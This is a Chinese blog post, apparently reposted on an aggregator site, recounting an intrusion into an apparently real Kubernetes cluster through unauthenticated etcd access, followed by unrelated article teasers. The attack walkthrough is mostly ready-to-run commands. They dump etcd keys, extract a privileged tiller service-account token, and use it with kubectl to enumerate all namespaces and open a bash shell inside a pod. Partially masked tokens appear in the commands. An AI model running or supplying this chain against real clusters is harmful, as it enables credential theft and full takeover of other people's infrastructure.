ETCD 未授权访问实战案例

1、发现 etcd 未授权。
https://xxx200:2379/v2/keys
image.png
2、尝试在etcd里查询管理员的token,然后使用该token配合kubectl指令接管集群。

proxychains ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://xxx0:2379/ get / --prefix --keys-only | grep /secrets/

image.png
最终发现/registry/secrets/kube-system/tiller-token-vnnjg 为高权限 token。

proxychains ./etcdctl  --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://xxx:2379/ get /registry/secrets/kube-system/tiller-token-xxx

image.png
3、通常情况下 etcd 所在 ip 即为 6443 管理端口所在 ip,探测后发现 6443 端口开放,接下来可通过 kubectl 操作 k8s。
列出kube-system 下所有 pods。

./kubectl --insecure-skip-tls-verify -s https://xxx:6443/ --token="eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJ0xxxrRffRMx6p5lUvCPFm1b8LIY53eeq2jL0EA2ScjHPR26t9-OkGiR0bLPHpq85TmzEywKLvF03XRue_6o7uVc67W7y_7sjSSRSb-MzBHKjCYE-RqQY6-1X2JS_5m3ftlQFrQ2CUgC5HSlBA2LmP_5fJieVfX1vmL1pshjKK8Z-WlIC0STz_Qr2SLUOjBUGPATnK7yf6_q6gMCZ_p_MJVJ-kr74AxvRAcg" -n kube-system get pods

image.png

列出所有ns的pod、services

proxychains ./kubectl --insecure-skip-tls-verify -s https://xxx:6443/ --token="eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJ0aWxsZXItdG9rZW4tdm5uamciLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2xxxA2LmP_5fJieVfX1vmL1pshjKK8Z-WlIC0STz_Qr2SLUOjBUGPATnK7yf6_q6gMCZ_p_MJVJ-kr74AxvRAcg" get pods,svc --all-namespaces -o wide

image.png
权限证明。

./kubectl --insecure-skip-tls-verify -s https://xxx:6443/ --token="eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcxxxywKLvF03XRue_6o7uVc67W7y_7sjSSRSb-MzBHKjCYE-RqQY6-1X2JS_5m3ftlQFrQ2CUgC5HSlBA2LmP_5fJieVfX1vmL1pshjKK8Z-WlIC0STz_Qr2SLUOjBUGPATnK7yf6_q6gMCZ_p_MJVJ-kr74AxvRAcg" exec -it pod/xxx -n xxx -- bash

image.png
pod 数量 131 个,实际容器数量大于等于 131 台。
image.png

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/624605.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

12月威胁态势 | 0day占比超82%!两大勒索家族“均分天下”

12月威胁态势 | 0day占比超82%!两大勒索家族“均分天下”

近日,亚信安全正式发布《亚信安全2023年12月威胁态势报告》(以下简称“报告”)报告显示,12月份新增安全漏洞1511个, APT 攻防较量日趋复杂,成为网络空间与现实地缘政治融汇交织新的风险点;监测发…
阅读更多...
精品量化公式——“主力拉升”,信号出现股价随时准备拉升

精品量化公式——“主力拉升”,信号出现股价随时准备拉升

► 日线表现 代码评估 技术指标代码评估: 计算变量: HSL1:5;:设置了一个常数变量。 VAR0 到 VAR6:这些变量通过复杂的计算公式来定义,通常涉及收盘价、最高价、最低价、开盘价以及它们的历史数据。 技术指标和信号: 线: VAR6 …
阅读更多...
使用Dockerfile构建镜像的详细指南

使用Dockerfile构建镜像的详细指南

目录 前言 一、什么是 Dockerfile 二、使用 Dockerfile 定制镜像 开始构建镜像 上下文路径 三、指令详解 四、构建阿里云仓库 前言 Docker是一种流行的容器化平台,可以帮助开发人员和运维团队更轻松地构建、发布和运行应用程序。在Docker中,镜像是…
阅读更多...
使用注解@GrpcService在Spring Boot 中开始使用gRPC

使用注解@GrpcService在Spring Boot 中开始使用gRPC

介绍 在现代微服务架构中,不同服务之间高效、健壮和可扩展的通信至关重要。gRPC是由Google开发的高性能开源框架,使客户端和服务器应用能够无缝、高效地进行通信。本文将指导您通过使用GrpcService注解将gRPC集成到Spring Boot应用程序中的步骤。 gRPC…
阅读更多...
虾皮开通:如何在虾皮(Shopee)平台上开通店铺详细步骤

虾皮开通:如何在虾皮(Shopee)平台上开通店铺详细步骤

在全球电商市场的竞争中,越来越多的卖家选择在虾皮(Shopee)平台上开设店铺。作为东南亚地区最大的电子商务平台之一,虾皮提供了一个便捷的销售渠道,吸引了数百万的买家和卖家。如果您想在虾皮上开设自己的店铺&#xf…
阅读更多...
【Leetcode】二叉树的递归遍历

【Leetcode】二叉树的递归遍历

【Leetcode】二叉树的递归遍历 先序遍历题目链接代码一:代码二: 迭代法先序遍历:中序遍历:后序遍历: 先序遍历 题目链接 【Leetcode】二叉树的递归遍历 代码一: /*** Definition for a binary tree nod…
阅读更多...
使用官方构建工具来创建一个vue3的项目

使用官方构建工具来创建一个vue3的项目

当你使用 Vite 构建项目时,可能会发现在命令行界面无法选择是否包含 TypeScript 等其他基础配置。此外,使用 vue create 命令创建项目时,默认会使用 vue-cli,但项目启动等过程可能较慢。在这种情况下,你可以参考以下步…
阅读更多...
Matlab论文插图绘制模板第135期—隐函数曲面图(fimplicit3)

Matlab论文插图绘制模板第135期—隐函数曲面图(fimplicit3)

在之前的文章中,分享了Matlab隐函数折线图的绘制模板: 进一步,再来分享一下隐函数曲面图。 先来看一下成品效果: 特别提示:本期内容『数据代码』已上传资源群中,加群的朋友请自行下载。有需要的朋友可以关…
阅读更多...
CG Magic分享3dmax渲染太亮问题如何解决?

CG Magic分享3dmax渲染太亮问题如何解决?

3D Max软件渲染时,渲染问题较多也是正常的,对于行业小白来说,渲染问题多也是能理解的,因为,小编经常在问答中,看到一些网友提问,3dmax渲染太亮怎么办? 3dmax渲染太亮了怎么回事&…
阅读更多...
SpringSecurity入门demo(四)授权

SpringSecurity入门demo(四)授权

一、授权demo: 1、资源权限: RequestMapping("/menu") RestController public class MenuManageController {RequestMapping("/test")public String test(){return "这是菜单管理";} }RequestMapping("/role"…
阅读更多...
pycharm的使用技巧

pycharm的使用技巧

1.新建文件时,自动生成代码 settings->editor->file and code templates,选择python script ${NAME} 文件名 ${DATE} 日期 2.自动补齐自定义段落 settings->editor->live templates,在右侧点击+号,添加自定义的内容 完成之后,在下方勾选python 3.修改注释的…
阅读更多...
就业难,程序员年纪大了怎么办?

就业难,程序员年纪大了怎么办?

程序员作为一项技术工种,年龄的确可能成为职业生涯发展的一大障碍。但年龄并不是决定职业生涯终点的唯一因素,只要保持对技术的热爱、不断学习提升,并积极调整心态,仍有许多出路可以选择。 1. 职业发展路线 随着年龄的增长&#…
阅读更多...
ModuleNotFoundError: No module named ‘mysql‘

ModuleNotFoundError: No module named ‘mysql‘

首先安装虚拟环境 python3 -m venv myenv 激活虚拟环境 source myenv/bin/activate 报错如下 raceback (most recent call last):File "test.py", line 1, in <module>import mysql.connector ModuleNotFoundError: No module named mysql 解决方法&#…
阅读更多...
[DM8] 序列使用说明

[DM8] 序列使用说明

注意&#xff1a;创建序列需要CREATE SEQUENCE系统权限 创建序列 CREATE SEQUENCE [ <模式名>.] <序列名> [ <序列选项列表>]; 序列选项&#xff1a; INCREMENT BY <增量值>| START WITH <初值>| MAXVALUE <最大值>| NOMAXVALUE| MINVA…
阅读更多...
TDL_big syposis 点评三国之道第一部:桃园三结义

TDL_big syposis 点评三国之道第一部:桃园三结义

点评三国之道第一部&#xff1a;桃园三结义 I) I) 滚滚长江东逝水&#xff0c;浪花淘尽英雄,是非成败转头空&#xff0c;青山依旧在&#xff0c;几度夕阳红&#xff0c;&#xff08;滚滚长江&#xff0c;汹涌东逝&#xff0c;不可拒&#xff0c;不可留。浪花飞溅&#xff0c;千…
阅读更多...
系分备考计算机网络传输介质、通信方式和交换方式

系分备考计算机网络传输介质、通信方式和交换方式

文章目录 1、概述2、传输介质3、网络通信4、网络交换5、总结 1、概述 计算机网路是系统分析师考试的常考知识点&#xff0c;本篇主要记录了知识点&#xff1a;网络传输介质、网络通信和数据交换方式等。 2、传输介质 网络的传输最常见的就是网线&#xff0c;也就是双绞线&…
阅读更多...
开源内容管理系统Wagtail本地安装运行并结合内网穿透实现公网访问

开源内容管理系统Wagtail本地安装运行并结合内网穿透实现公网访问

文章目录 前言1. 安装并运行Wagtail1.1 创建并激活虚拟环境 2. 安装cpolar内网穿透工具3. 实现Wagtail公网访问4. 固定的Wagtail公网地址 前言 Wagtail是一个用Python编写的开源CMS&#xff0c;建立在Django Web框架上。Wagtail 是一个基于 Django 的开源内容管理系统&#xf…
阅读更多...
最新油价API接口查询 - java版

最新油价API接口查询 - java版

今日国内油价查询API提供今日全国各地不同标号的油品价格信息。这个接口在市场监控、数据分析、市场投资等领域具有应用市场&#xff0c;通过此接口获取最新的油价信息。 首先&#xff0c;在数据平台中使用API接口需要先注册后申请此API接口。申请成功后使用个人中心的API秘钥…
阅读更多...
Docker-Compose详解与部署示例

Docker-Compose详解与部署示例

Docker Compose是一个用于定义和运行多容器Docker应用程序的工具。它允许你使用YAML文件配置应用程序的服务、网络和卷&#xff0c;并通过一个简单的命令集启动和管理整个应用程序的容器。通过使用Docker Compose&#xff0c;可以轻松地将多个Docker容器协同工作&#xff0c;构…
阅读更多...
Arduino| 开发板介绍、编程入门(引脚信号的输入输出)

Arduino| 开发板介绍、编程入门(引脚信号的输入输出)

Arduino开发板介绍、编程入门 开发板介绍编程入门setup和loop函数引脚信号输入输出数字信号模拟信号 开发板介绍 下面是一张Ardunio Uno R3的引脚图&#xff0c;包含14个数字引脚、6个模拟输入、电源插孔、USB连接和ICSP插头等。 14个数字引脚&#xff1a; Serial&#xff…
阅读更多...
最新文章

Copyright @ 2022~2023